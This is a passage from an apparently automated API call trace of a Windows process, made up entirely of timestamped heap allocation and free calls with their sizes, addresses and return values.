(HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa98 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aab0 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93100 [0251.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa80 | out: hHeap=0xc60000) returned 1 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa80 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93558 [0251.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa98 | out: hHeap=0xc60000) returned 1 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa98 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93570 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93588 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xc8a628 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935a0 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc865c0 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93110 [0251.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935b8 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935d0 [0251.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935a0 | out: hHeap=0xc60000) returned 1 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935a0 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935e8 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93600 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93618 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93630 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93648 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93120 [0251.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93618 | out: hHeap=0xc60000) returned 1 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93618 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93660 [0251.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93630 | out: hHeap=0xc60000) returned 1 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93630 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93678 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x100) returned 0xc93940 [0251.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc934b8 | out: hHeap=0xc60000) returned 1 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93690 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86610 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936a8 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86638 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93130 [0251.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86610 | out: hHeap=0xc60000) returned 1 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936c0 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936d8 [0251.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936a8 | out: hHeap=0xc60000) returned 1 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936a8 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2) returned 0xc93140 [0251.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936f0 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93708 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93150 [0251.346] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93140 | out: hHeap=0xc60000) returned 1 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93720 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93738 [0251.346] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936f0 | out: hHeap=0xc60000) returned 1 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936f0 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xc86610 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93750 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86660 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93140 [0251.346] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86610 | out: hHeap=0xc60000) returned 1 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93768 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93780 [0251.346] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93750 | out: hHeap=0xc60000) returned 1 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93750 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93798 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937c8 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937e0 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xac) returned 0xc93a48 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937f8 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93810 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93828 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93840 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93858 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93870 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93888 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc938a0 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc938b8 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc938d0 [0251.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc938e8 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93900 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93918 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b18 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93b30 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b48 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b60 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b78 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b90 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93ba8 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93bc0 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93bd8 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93bf0 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c08 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93c20 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c38 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c50 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c68 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c80 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93c98 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93cb0 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93cc8 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ce0 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93cf8 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93d10 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93d28 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93d40 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93d58 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93d70 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93d88 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93da0 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93db8 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93dd0 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93de8 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93e00 [0251.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e18 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e30 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93e48 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e60 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e78 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93e90 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ea8 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ec0 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ed8 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f18 [0251.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f30 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7b0 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a798 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a780 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a810 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7c8 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7e0 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a870 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a828 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a840 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8d0 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8b8 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a888 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a918 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a900 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8e8 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a930 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a948 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9a8 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a960 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a978 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9c0 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9d8 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa38 | out: hHeap=0xc60000) returned 1 [0251.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9f0 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa08 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa50 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa68 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93558 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa80 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa98 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93570 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93588 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935d0 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935b8 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935a0 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935e8 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93600 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93660 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93618 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93630 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93678 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93690 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936d8 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936c0 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936a8 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93738 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93720 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936f0 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93780 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93768 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93750 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93798 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937b0 | out: hHeap=0xc60000) returned 1 [0251.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937e0 | out: hHeap=0xc60000) returned 1 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937e0 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937c8 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93160 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93160 | out: hHeap=0xc60000) returned 1 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937e0 | out: hHeap=0xc60000) returned 1 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937e0 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xc8a628 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937c8 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86610 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93160 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93798 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937c8 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86688 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93750 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93768 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93780 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936f0 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937e0 | out: hHeap=0xc60000) returned 1 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93798 | out: hHeap=0xc60000) returned 1 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937b0 | out: hHeap=0xc60000) returned 1 [0251.350] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x6) returned 0xc93170 [0251.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937c8 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93170 | out: hHeap=0xc60000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937c8 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93798 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937e0 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93170 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937b0 | out: hHeap=0xc60000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93720 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93798 | out: hHeap=0xc60000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93798 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93738 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936a8 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93190 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936c0 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936d8 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93738 | out: hHeap=0xc60000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xc93738 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93690 [0251.351] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0251.351] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93690 | out: hHeap=0xc60000) returned 1 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93738 | out: hHeap=0xc60000) returned 1 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93738 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xc93690 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93678 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93678 | out: hHeap=0xc60000) returned 1 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93690 | out: hHeap=0xc60000) returned 1 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93690 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x12) returned 0xc8a628 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc866b0 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc866b0 | out: hHeap=0xc60000) returned 1 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0251.352] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93678 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93630 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93618 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93660 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93600 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935e8 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2) returned 0xc93180 [0251.352] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935a0 [0251.352] RtlAllocateHeap 